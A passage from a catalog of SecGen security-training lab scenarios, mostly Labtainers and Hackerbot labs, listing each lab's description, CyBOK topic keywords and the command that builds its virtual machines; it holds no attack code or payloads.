| Network Security (NS) | Internet Architecture | network layer security |
| Web & Mobile Security (WAM) | FIREWALLS | FIREWALLS |

Command to build VMs and start scenario:

```bash
ruby secgen.rb -s scenarios/labs/labtainers/iptables-ics.xml run
```

View source

labtainers/iptables.xml

Details

Key Data
Name Labtainers lab: iptables
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Network Security (NS) | Network Defence Tools | FIREWALLS; IPTables |
| Network Security (NS) | Internet Architecture | network layer security |
| Web & Mobile Security (WAM) | FIREWALLS | FIREWALLS |

Command to build VMs and start scenario:

```bash
ruby secgen.rb -s scenarios/labs/labtainers/iptables.xml run
```

View source

labtainers/iptables2.xml

Details

Key Data
Name Labtainers lab: iptables2
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Network Security (NS) | Network Defence Tools | FIREWALLS; IPTables |
| Network Security (NS) | Internet Architecture | network layer security |
| Web & Mobile Security (WAM) | FIREWALLS | FIREWALLS |

Command to build VMs and start scenario:

```bash
ruby secgen.rb -s scenarios/labs/labtainers/iptables2.xml run
```

View source

labtainers/ldap.xml

Details

Key Data
Name Labtainers lab: ldap
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Authentication, Authorisation & Accountability (AAA) | Authentication | identity management; user authentication; facets of authentication; authentication in distributed systems |
| Authentication, Authorisation & Accountability (AAA) | Authorisation | AUTHORIZATION - LDAP (LIGHTWEIGHT DIRECTORY ACCESS PROTOCOL) |
| Security Operations & Incident Management (SOIM) | Monitor: Data Sources | network traffic |

Command to build VMs and start scenario:

```bash
ruby secgen.rb -s scenarios/labs/labtainers/ldap.xml run
```

View source

labtainers/local-dns.xml

Details

Key Data
Name Labtainers lab: local-dns
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Network Security (NS) | Network Protocols and Vulnerability | ADDRESS RESOLUTION PROTOCOL(ARP); ARP (ADDRESS RESOLUTION PROTOCOL); ARP SPOOFING; DNS ATTACKS |

Command to build VMs and start scenario:

```bash
ruby secgen.rb -s scenarios/labs/labtainers/local-dns.xml run
```

View source

labtainers/macs-hash.xml

Details

Key Data
Name Labtainers lab: macs-hash
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Authentication, Authorisation & Accountability (AAA) | Authentication | user authentication; Cryptography and authentication (hashes and attacks against authentication schemes / passwords) |
| Applied Cryptography (AC) | Public-Key Cryptography | symmetric encryption and authentication; MESSAGE AUTHENTICATION CODE (MAC); HASHED MESSAGE AUTHENTICATION CODE (HMAC) |
| Forensics (F) | Artifact Analysis | cryptographic hashing |

Command to build VMs and start scenario:

```bash
ruby secgen.rb -s scenarios/labs/labtainers/macs-hash.xml run
```

View source

labtainers/metasploit.xml

Details

Key Data
Name Labtainers lab: metasploit
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Malware & Attack Technology (MAT) | Malicious Activities by Malware | cyber kill chain |
| Malware & Attack Technology (MAT) | Attacks and exploitation | EXPLOITATION; EXPLOITATION FRAMEWORKS |
| Security Operations & Incident Management (SOIM) | PENETRATION TESTING | PENETRATION TESTING - SOFTWARE TOOLS; PENETRATION TESTING - ACTIVE PENETRATION |

Command to build VMs and start scenario:

```bash
ruby secgen.rb -s scenarios/labs/labtainers/metasploit.xml run
```

View source

labtainers/nix-commands.xml

Details

Key Data
Name Labtainers lab: nix-commands
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Authentication, Authorisation & Accountability (AAA) | Authorisation | access control |
| Network Security (NS) | PENETRATION TESTING | PENETRATION TESTING - NETWORK MAPPING - PING |

Command to build VMs and start scenario:

```bash
ruby secgen.rb -s scenarios/labs/labtainers/nix-commands.xml run
```

View source

labtainers/nmap-discovery.xml

Details

Key Data
Name Labtainers lab: nmap-discovery
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Network Security (NS) | PENETRATION TESTING | PENETRATION TESTING - NETWORK MAPPING - FINGERPRINTING; PENETRATION TESTING - NETWORK MAPPING - NMAP |

Command to build VMs and start scenario:

```bash
ruby secgen.rb -s scenarios/labs/labtainers/nmap-discovery.xml run
```

View source

labtainers/nmap-ssh.xml

Details

Key Data
Name Labtainers lab: nmap-ssh
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Network Security (NS) | PENETRATION TESTING | PENETRATION TESTING - NETWORK MAPPING - FINGERPRINTING; PENETRATION TESTING - NETWORK MAPPING - NMAP |
| Security Operations & Incident Management (SOIM) | CM (CONFIGURATION MANAGEMENT) | SSH (SECURE SHELL) |

Command to build VMs and start scenario:

```bash
ruby secgen.rb -s scenarios/labs/labtainers/nmap-ssh.xml run
```

View source

labtainers/onewayhash.xml

Details

Key Data
Name Labtainers lab: onewayhash
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Authentication, Authorisation & Accountability (AAA) | Authentication | user authentication; Cryptography and authentication (hashes and attacks against authentication schemes / passwords) |
| Applied Cryptography (AC) | Public-Key Cryptography | symmetric encryption and authentication; MESSAGE AUTHENTICATION CODE (MAC) |
| Forensics (F) | Artifact Analysis | cryptographic hashing |

Command to build VMs and start scenario:

```bash
ruby secgen.rb -s scenarios/labs/labtainers/onewayhash.xml run
```

View source

labtainers/packet-introspection.xml

Details

Key Data
Name Labtainers lab: packet-introspection
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Forensics (F) | Main Memory Forensics | network connections; data recovery and file content carving |
| Security Operations & Incident Management (SOIM) | Monitor: Data Sources | network traffic |

Command to build VMs and start scenario:

```bash
ruby secgen.rb -s scenarios/labs/labtainers/packet-introspection.xml run
```

View source

labtainers/pass-crack.xml

Details

Key Data
Name Labtainers lab: pass-crack
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Forensics (F) | Artifact Analysis | cryptographic hashing |
| Software Security (SS) | Authentication | user authentication; Cryptography and authentication (hashes and attacks against authentication schemes / passwords) |

Command to build VMs and start scenario:

```bash
ruby secgen.rb -s scenarios/labs/labtainers/pass-crack.xml run
```

View source

labtainers/pcapanalysis.xml

Details

Key Data
Name Labtainers lab: pcapanalysis
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Forensics (F) | Main Memory Forensics | network connections |
| Network Security (NS) | OSI (OPEN SYSTEM INTERCONNECT) MODEL | APPLICATION LAYER; DATA LINK LAYER; NETWORK LAYER |
| Security Operations & Incident Management (SOIM) | Monitor: Data Sources | PCAP; network traffic |

Command to build VMs and start scenario:

```bash
ruby secgen.rb -s scenarios/labs/labtainers/pcapanalysis.xml run
```

View source

labtainers/plc-app.xml

Details

Key Data
Name Labtainers lab: plc-app
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Cyber-Physical Systems Security (CPS) | Cyber-Physical Systems | characteristics; security and privacy concerns |
| Cyber-Physical Systems Security (CPS) | Cyber-Physical Systems Domains | industrial control systems |

Command to build VMs and start scenario:

```bash
ruby secgen.rb -s scenarios/labs/labtainers/plc-app.xml run
```

View source

labtainers/plc-forensics-adv.xml

Details

Key Data
Name Labtainers lab: plc-forensics-adv
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Cyber-Physical Systems Security (CPS) | Cyber-Physical Systems | characteristics; security and privacy concerns |
| Cyber-Physical Systems Security (CPS) | Cyber-Physical Systems Domains | industrial control systems |

Command to build VMs and start scenario:

```bash
ruby secgen.rb -s scenarios/labs/labtainers/plc-forensics-adv.xml run
```

View source

labtainers/plc-forensics.xml

Details

Key Data
Name Labtainers lab: plc-forensics
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Cyber-Physical Systems Security (CPS) | Cyber-Physical Systems | characteristics; security and privacy concerns |
| Cyber-Physical Systems Security (CPS) | Cyber-Physical Systems Domains | industrial control systems |

Command to build VMs and start scenario:

```bash
ruby secgen.rb -s scenarios/labs/labtainers/plc-forensics.xml run
```

View source

labtainers/plc.xml

Details

Key Data
Name Labtainers lab: plc
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Cyber-Physical Systems Security (CPS) | Cyber-Physical Systems | characteristics; security and privacy concerns |
| Cyber-Physical Systems Security (CPS) | Cyber-Physical Systems Domains | industrial control systems |

Command to build VMs and start scenario:

```bash
ruby secgen.rb -s scenarios/labs/labtainers/plc.xml run
```

View source

labtainers/pubkey.xml

Details

Key Data
Name Labtainers lab: pubkey
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Applied Cryptography (AC) | Algorithms, Schemes and Protocols | TLS |
| Network Security (NS) | Internet Architecture | transport layer security |

Command to build VMs and start scenario:

```bash
ruby secgen.rb -s scenarios/labs/labtainers/pubkey.xml run
```

View source

labtainers/radius.xml

Details

Key Data
Name Labtainers lab: radius
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Authentication, Authorisation & Accountability (AAA) | Authentication | identity management; user authentication; facets of authentication; authentication in distributed systems |
| Network Security (NS) | Internet Architecture | link layer security |

Command to build VMs and start scenario:

```bash
ruby secgen.rb -s scenarios/labs/labtainers/radius.xml run
```

View source

labtainers/remote-dns.xml

Details

Key Data
Name Labtainers lab: remote-dns
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Network Security (NS) | Network Protocols and Vulnerability | ADDRESS RESOLUTION PROTOCOL(ARP); ARP (ADDRESS RESOLUTION PROTOCOL); ARP SPOOFING; DNS ATTACKS |

Command to build VMs and start scenario:

```bash
ruby secgen.rb -s scenarios/labs/labtainers/remote-dns.xml run
```

View source

labtainers/retlibc.xml

Details

Key Data
Name Labtainers lab: retlibc
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Software Security (SS) | Categories of Vulnerabilities | memory management vulnerabilities; Stack smashing buffer overflows |
| Software Security (SS) | Mitigating Exploitation | NON-EXECUTABLE MEMORY |
| Malware & Attack Technology (MAT) | Attacks and exploitation | EXPLOITATION; EXPLOITATION FRAMEWORKS; Exploit development; Metasploit Framework development; Mitigation bypass: non-executable memory |

Command to build VMs and start scenario:

```bash
ruby secgen.rb -s scenarios/labs/labtainers/retlibc.xml run
```

View source

labtainers/routing-basics.xml

Details

Key Data
Name Labtainers lab: routing-basics
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Network Security (NS) | Internet Architecture | network layer security |

Command to build VMs and start scenario:

```bash
ruby secgen.rb -s scenarios/labs/labtainers/routing-basics.xml run
```

View source

labtainers/routing-basics2.xml

Details

Key Data
Name Labtainers lab: routing-basics2
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Network Security (NS) | Internet Architecture | network layer security |

Command to build VMs and start scenario:

```bash
ruby secgen.rb -s scenarios/labs/labtainers/routing-basics2.xml run
```

View source

labtainers/setuid-env.xml

Details

Key Data
Name Labtainers lab: setuid-env
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Authentication, Authorisation & Accountability (AAA) | Authorisation | access control; Elevated privileges; Real and effective identity; Vulnerabilities and attacks on access control misconfigurations |
| Operating Systems & Virtualisation (OSV) | Primitives for Isolation and Mediation | Access controls and operating systems; Linux security model; Unix File Permissions; setuid/setgid |

Command to build VMs and start scenario:

```bash
ruby secgen.rb -s scenarios/labs/labtainers/setuid-env.xml run
```

View source

labtainers/snort.xml

Details

Key Data
Name Labtainers lab: snort
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Security Operations & Incident Management (SOIM) | Monitor: Data Sources | network traffic |
| Security Operations & Incident Management (SOIM) | Analyse: Analysis Methods | misuse detection; anomaly detection |
| Security Operations & Incident Management (SOIM) | Execute: Mitigation and Countermeasures | intrusion prevention systems |
| Network Security (NS) | Network Defence Tools | packet filters; intrusion detection systems; IDS rules creation |
| Malware & Attack Technology (MAT) | Malware Detection | attack detection |

Command to build VMs and start scenario:

```bash
ruby secgen.rb -s scenarios/labs/labtainers/snort.xml run
```

View source

labtainers/softplc.xml

Details

Key Data
Name Labtainers lab: softplc
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Cyber-Physical Systems Security (CPS) | Cyber-Physical Systems | characteristics; security and privacy concerns |
| Cyber-Physical Systems Security (CPS) | Cyber-Physical Systems Domains | industrial control systems |

Command to build VMs and start scenario:

```bash
ruby secgen.rb -s scenarios/labs/labtainers/softplc.xml run
```

View source

labtainers/softplc2.xml

Details

Key Data
Name Labtainers lab: softplc2
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Cyber-Physical Systems Security (CPS) | Cyber-Physical Systems | characteristics; security and privacy concerns |
| Cyber-Physical Systems Security (CPS) | Cyber-Physical Systems Domains | industrial control systems |

Command to build VMs and start scenario:

```bash
ruby secgen.rb -s scenarios/labs/labtainers/softplc2.xml run
```

View source

labtainers/sql-inject.xml

Details

Key Data
Name Labtainers lab: sql-inject
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Software Security (SS) | Categories of Vulnerabilities | Web vulnerabilities / OWASP Top 10; API vulnerabilities |
| Software Security (SS) | Prevention of Vulnerabilities | coding practices; Protecting against session management attacks; XSS; SQLi; CSRF; API design |
| Web & Mobile Security (WAM) | Server-Side Vulnerabilities and Mitigations | injection vulnerabilities; server-side misconfiguration and vulnerable components; SQL-INJECTION |

Command to build VMs and start scenario:

```bash
ruby secgen.rb -s scenarios/labs/labtainers/sql-inject.xml run
```

View source

labtainers/ssh-agent.xml

Details

Key Data
Name Labtainers lab: ssh-agent
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Applied Cryptography (AC) | Public-Key Cryptography | public-key encryption; public-key signatures |

Command to build VMs and start scenario:

```bash
ruby secgen.rb -s scenarios/labs/labtainers/ssh-agent.xml run
```

View source

labtainers/sshlab.xml

Details

Key Data
Name Labtainers lab: sshlab
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Applied Cryptography (AC) | Public-Key Cryptography | public-key encryption; public-key signatures |

Command to build VMs and start scenario:

```bash
ruby secgen.rb -s scenarios/labs/labtainers/sshlab.xml run
```

View source

labtainers/ssl.xml

Details

Key Data
Name Labtainers lab: ssl
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Applied Cryptography (AC) | Public-Key Cryptography | public-key encryption; public-key signatures |
| Cyber-Physical Systems Security (CPS) | Cyber-Physical Systems | characteristics; security and privacy concerns |
| Cyber-Physical Systems Security (CPS) | Cyber-Physical Systems Domains | industrial control systems |

Command to build VMs and start scenario:

```bash
ruby secgen.rb -s scenarios/labs/labtainers/ssl.xml run
```

View source

labtainers/symkeylab.xml

Details

Key Data
Name Labtainers lab: symkeylab
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Applied Cryptography (AC) | Algorithms, Schemes and Protocols | AES |
| Applied Cryptography (AC) | Symmetric Cryptography | symmetric primitives; symmetric encryption and authentication |

Command to build VMs and start scenario:

```bash
ruby secgen.rb -s scenarios/labs/labtainers/symkeylab.xml run
```

View source

labtainers/sys-log.xml

Details

Key Data
Name Labtainers lab: sys-log
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Security Operations & Incident Management (SOIM) | Monitor: Data Sources | application logs: web server logs and files; system and kernel logs; Syslog |

Command to build VMs and start scenario:

```bash
ruby secgen.rb -s scenarios/labs/labtainers/sys-log.xml run
```

View source

labtainers/tcpip.xml

Details

Key Data
Name Labtainers lab: tcpip
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Network Security (NS) | Internet Architecture | transport layer security |
| Network Security (NS) | Network Protocols and Vulnerability | common network attacks |

Command to build VMs and start scenario:

```bash
ruby secgen.rb -s scenarios/labs/labtainers/tcpip.xml run
```

View source

labtainers/telnetlab.xml

Details

Key Data
Name Labtainers lab: telnetlab
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Network Security (NS) | REMOTE ACCESS | TELNET |
| Network Security (NS) | TCP/IP | SSH (SECURE SHELL); TELNET; TERMINAL EMULATION PROTOCOL (TELNET) |

Command to build VMs and start scenario:

```bash
ruby secgen.rb -s scenarios/labs/labtainers/telnetlab.xml run
```

View source

labtainers/vpnlab.xml

Details

Key Data
Name Labtainers lab: vpnlab
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Network Security (NS) | Network Defence Tools | VIRTUAL - PRIVATE NETWORK (VPN) |

Command to build VMs and start scenario:

```bash
ruby secgen.rb -s scenarios/labs/labtainers/vpnlab.xml run
```

View source

labtainers/vpnlab2.xml

Details

Key Data
Name Labtainers lab: vpnlab2
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Network Security (NS) | Network Defence Tools | VIRTUAL - PRIVATE NETWORK (VPN) |

Command to build VMs and start scenario:

```bash
ruby secgen.rb -s scenarios/labs/labtainers/vpnlab2.xml run
```

View source

labtainers/webtrack.xml

Details

Key Data
Name Labtainers lab: webtrack
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Forensics (F) | WEB | WEB BROWSERS |
| Web & Mobile Security (WAM) | Fundamental Concepts and Approaches | BROWSER; cookies |

Command to build VMs and start scenario:

```bash
ruby secgen.rb -s scenarios/labs/labtainers/webtrack.xml run
```

View source

labtainers/wireshark-intro.xml

Details

Key Data
Name Labtainers lab: wireshark-intro
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Security Operations & Incident Management (SOIM) | Monitor: Data Sources | network traffic |

Command to build VMs and start scenario:

```bash
ruby secgen.rb -s scenarios/labs/labtainers/wireshark-intro.xml run
```

View source

labtainers/xforge.xml

Details

Key Data
Name Labtainers lab: xforge
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Web & Mobile Security (WAM) | Server-Side Vulnerabilities and Mitigations | CROSS-SITE REQUEST FORGERY (CSRF) |
| Software Security (SS) | Prevention of Vulnerabilities | Protecting against session management attacks; XSS; SQLi; CSRF |

Command to build VMs and start scenario:

```bash
ruby secgen.rb -s scenarios/labs/labtainers/xforge.xml run
```

View source

labtainers/xsite.xml

Details

Key Data
Name Labtainers lab: xsite
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Web & Mobile Security (WAM) | Server-Side Vulnerabilities and Mitigations | CROSS-SITE SCRIPTING (XSS) |
| Software Security (SS) | Prevention of Vulnerabilities | Protecting against session management attacks; XSS; SQLi; CSRF |

Command to build VMs and start scenario:

```bash
ruby secgen.rb -s scenarios/labs/labtainers/xsite.xml run
```

View source

response_and_investigation/1_integrity_protection.xml

Details

Key Data
Name Integrity protection lab
Description
Introduction
This lab addresses preserving the integrity of your digital assets. In today's data-driven world, ensuring the accuracy and reliability of information is of utmost importance. Unauthorized changes, whether intentional or accidental, can lead to significant data breaches and compromise the trustworthiness of your system. This lab is designed to provide you with essential knowledge and practical skills to fortify the security of your data by exploring key theoretical concepts like file permissions, file attributes, and read-only filesystems.

Throughout this lab, you will engage in practical exercises to grasp fundamental principles of data integrity protection. You'll explore the use of file attributes to restrict access and protect sensitive information. Furthermore, you'll discover the utility of read-only filesystems by mounting directories in read-only mode, ensuring that changes cannot be made to critical system files. By completing these exercises and challenges, you will acquire the skills to protect your system's integrity, thereby bolstering your cybersecurity proficiency and enhancing your ability to maintain data confidentiality and availability.

This is a Hackerbot lab. The labsheet is available once you claim a set of VMs. Work through the labsheet, then when prompted interact with Hackerbot.
Type ctf-lab; hackerbot-lab; lab-sheet
Author Z. Cliffe Schreuders
Linked videos https://www.youtube.com/watch?v=sv1pHuuoW9g; https://www.youtube.com/watch?v=grISRv-CuHE
VM names desktop; hackerbot_server

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Authentication, Authorisation & Accountability (AAA) | Authorisation | access control; Protecting integrity |
| Operating Systems & Virtualisation (OSV) | Primitives for Isolation and Mediation | Linux read only protections: ro mounts; file attributes |

Command to build VMs and start scenario:

```bash
ruby secgen.rb -s scenarios/labs/response_and_investigation/1_integrity_protection.xml run
```

View source

response_and_investigation/2_integrity_detection.xml

Details

Key Data
Name Integrity detection lab
Description
Introduction
Integrity management is a crucial aspect of information security, focusing on preventing and detecting unauthorized changes to resources, such as files and configurations, within a computer system. Maintaining the integrity of these resources is vital in ensuring the trustworthiness of a system, as any unauthorized changes can lead to security breaches and data corruption. This lab sheet delves into the various techniques for detecting changes to system integrity, including the use of backups, file hashing, and package verification. It emphasizes the importance of these methods in safeguarding the integrity of a system and provides hands-on exercises to demonstrate their practical application.

In this lab, you will learn about different strategies for detecting unauthorized changes. You will create and compare backups of critical system files, generate and compare file hashes using tools like `md5sum` and `sha1deep`, and explore package verification as a way to check the integrity of installed software packages. You will face challenges from Hackerbot, where you'll apply the learned techniques to detect and respond to various security threats, such as new user accounts, changes to configuration files, and binaries replaced with malware. This hands-on experience will equip you with the skills and knowledge needed to protect and maintain the integrity of a computer system, a fundamental component of effective information security.

This is a Hackerbot lab. The labsheet is available once you claim a set of VMs. Work through the labsheet, then when prompted interact with Hackerbot.
Type ctf-lab; hackerbot-lab; lab-sheet
Author Z. Cliffe Schreuders
Linked videos https://www.youtube.com/watch?v=qzyEdeQ_7ZY; https://www.youtube.com/watch?v=kz7m-iyzSOw
VM names desktop; hackerbot_server

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Forensics (F) | Artifact Analysis | cryptographic hashing |
| Security Operations & Incident Management (SOIM) | Monitor: Data Sources | MONITORING - FILE INTEGRITY CHECKERS |
| Operating Systems & Virtualisation (OSV) | OS Hardening | code and data integrity checks |

Command to build VMs and start scenario:

```bash
ruby secgen.rb -s scenarios/labs/response_and_investigation/2_integrity_detection.xml run
```

View source

response_and_investigation/3_backups_and_recovery.xml

Details

Key Data
Name Backups lab
Description
Introduction
This lab focuses on the critical aspect of contingency planning in the context of cybersecurity and data management. It highlights the importance of maintaining data availability and system reliability, especially when dealing with potential disasters and security incidents. The lab delves into practical strategies for creating reliable backups, understanding recovery procedures, and implementing backup solutions using the powerful rsync command.

In this lab, you will learn how to utilize SSH/SCP for secure file transfer, create full, differential, and incremental backups using the rsync tool, and employ backups for efficient data protection. You will also explore the concept of snapshot backups, which allow for efficient storage of data by using hard links to unchanged files. Throughout the lab, you will engage in hands-on tasks such as copying directories, performing backups, restoring files, and setting up remote backups. By completing these exercises, you will gain valuable skills in contingency planning and data backup strategies, which are essential for maintaining the availability and security of critical systems and data.

This is a Hackerbot lab. The labsheet is available once you claim a set of VMs. Work through the labsheet, then when prompted interact with Hackerbot.

Tips for the lab

This resource is very useful for understanding how rsync behaves depending on whether or not a path ends with a trailing slash, which often catches people out.

This lab needs to be completed in order.

Manually check that you have done your backups correctly before telling Hackerbot you are ready. It may be a good idea to ssh to your backup server in a separate console tab (`ssh IP-ADDRESS`), but do keep an eye on which system you are running each command on!

Keep an eye on the trailing slashes in rsync commands and how they change the behaviour (the difference between copying a directory and copying its contents).

Each time, you can test that your rsync command is going to do what you expect by adding `-n` to the command, which performs a "dry run" without making any of the actual changes. Once you are happy it is making the changes you expect, run it again without the `-n`.

Type ctf-lab; hackerbot-lab; lab-sheet
Author Z. Cliffe Schreuders
Linked videos https://youtu.be/lak1Sued4GY; https://youtu.be/stVomGROfbQ; https://youtu.be/n8IKEJUOISY
VM names desktop; backup_server; hackerbot_server

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Security Operations & Incident Management (SOIM) | Execute: Mitigation and Countermeasures | Recover data and services after an incident; BACKUP - DIFFERENTIAL; BACKUP - INFERENTIAL |

Command to build VMs and start scenario:

```bash
ruby secgen.rb -s scenarios/labs/response_and_investigation/3_backups_and_recovery.xml run
```

View source

response_and_investigation/4_ids.xml

Details

Key Data
Name IDS lab
Description
Introduction
Intrusion Detection and Prevention Systems (IDS/IPS) are crucial components of network security, helping organizations monitor and defend against malicious activities and unauthorized access. This lab focuses on network monitoring basics and hands-on experience with tools like Tcpdump, Wireshark, and Snort, all useful for detecting and responding to potential threats. Network monitoring is a foundational practice in cybersecurity, as it allows you to observe network traffic and identify any suspicious or unwanted behavior. In this lab, you will gain practical experience by monitoring live network traffic, setting up Snort to detect network attacks, and analyzing the captured data. By the end of this lab, you will have a better understanding of how IDS/IPS systems work and how to configure and use them effectively to enhance network security.

During this hands-on lab, you will learn how to set up network monitoring tools like Tcpdump and Wireshark to observe live network traffic. You will use these tools to detect specific strings in network packets and identify port scanning attempts on a web server. Additionally, you will configure Snort, a popular IDS, to monitor network traffic to detect network activities of interest. As part of your practical exercises, you will trigger Snort alerts by sending ICMP pings and monitor the alerts generated. Throughout the lab, you will also interact with Hackerbot, which will simulate network attacks, and you will need to use the tools you've learned to detect and respond to these simulated attacks. By completing these tasks, you will develop practical skills in network monitoring and intrusion detection.

This is a Hackerbot lab. The labsheet is available once you claim a set of VMs. Work through the labsheet, then when prompted interact with Hackerbot.
Type ctf-lab; hackerbot-lab; lab-sheet
Author Z. Cliffe Schreuders
